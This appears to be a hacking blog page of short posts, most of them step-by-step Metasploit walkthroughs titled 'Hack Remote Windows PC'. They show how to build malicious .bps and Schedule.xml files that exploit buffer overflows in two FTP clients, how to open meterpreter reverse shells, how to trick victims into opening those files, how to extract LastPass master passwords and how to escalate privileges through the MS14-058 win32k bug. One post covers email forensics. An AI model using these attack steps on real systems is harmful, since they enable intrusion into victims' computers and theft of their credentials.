Hack Remote Windows PC using BulletProof FTP Client BPS Buffer Overflow

at 9:10 AM Saturday, January 17, 2015 0 comments
This module exploits stack-based buffer overflow vulnerability in BulletProof FTP Client 2010, caused by an overly long hostname. By persuading the victim to open a specially-crafted .BPS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets
BulletProof FTP Client 2010

Requirement
Attacker: kali Linux
Victim PC: Windows XP 3


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/bpftp_client_bps_bof
msf exploit (bpftp_client_bps_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (bpftp_client_bps_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (bpftp_client_bps_bof)>exploit


After we successfully generate the malicious bps File, it will stored on your local computer
/root/.msf4/local/msf.bps


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit

Now send your msf.bps files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Labels: ,

Hack Remote Windows PC using i-FTP Schedule Buffer Overflow

at 7:11 AM 0 comments
This module exploits stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets
i-Ftp v2.20

Requirement
Attacker: kali Linux
Victim PC: Windows XP 3


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/iftp_schedule_bof
msf exploit (iftp_schedule_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (iftp_schedule_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (iftp_schedule_bof)>exploit


After we successfully generate the malicious xml File, it will stored on your local computer
/root/.msf4/local/schedule.xml


Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit

Now send your schedule.xml files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Labels: ,

How to Collect Email Evidence in Victim PC (Email Forensics)

at 6:43 AM Wednesday, January 14, 2015 0 comments
First capture the victim’s ram using dump it tool. (For details visit here)

Download bulk extractor viewer (from here) and install it in your PC.


Now open bulk extractor viewer and click on to generate report


Now select the dump it image file and select an output folder for the report and click on start bulk extractor as seen below


Now in order to investigate the victim saved information of Email ID Click on email.txt as seen below


And also click on email_histogram.txt

Labels:

Hack Saved LastPass Master Password in Remote Windows, Linux, MAC PC

at 2:20 PM Saturday, November 1, 2014 0 comments
This module extracts and decrypts LastPass master login accounts and passwords

Exploit Targets
lastpass

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use post/multi/gather/lastpass_creds
msf exploit (lastpass_creds)>set payload windows/meterpreter/reverse_tcp
msf exploit (lastpass_creds)>set lhost 192.168.1.103 (IP of Local Host)
msf exploit (lastpass_creds)>set session 1 (IP of Local Host)
msf exploit (lastpass_creds)>exploit

Labels: ,

Hack Remote Windows PC using Windows Track Popup Menu Win32k NULL Pointer Dereference

at 4:48 AM 0 comments
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSend MessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/local/ms14_058_track_popup_menu
msf exploit (ms14_058_track_popup_menu)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms14_058_track_popup_menu)>set lhost 192.168.0.111 (IP of Local Host)
msf exploit (ms14_058_track_popup_menu)>set session 1 (IP of Local Host)
msf exploit (ms14_058_track_popup_menu)>exploit

Labels: ,
Subscribe to: Posts (Atom)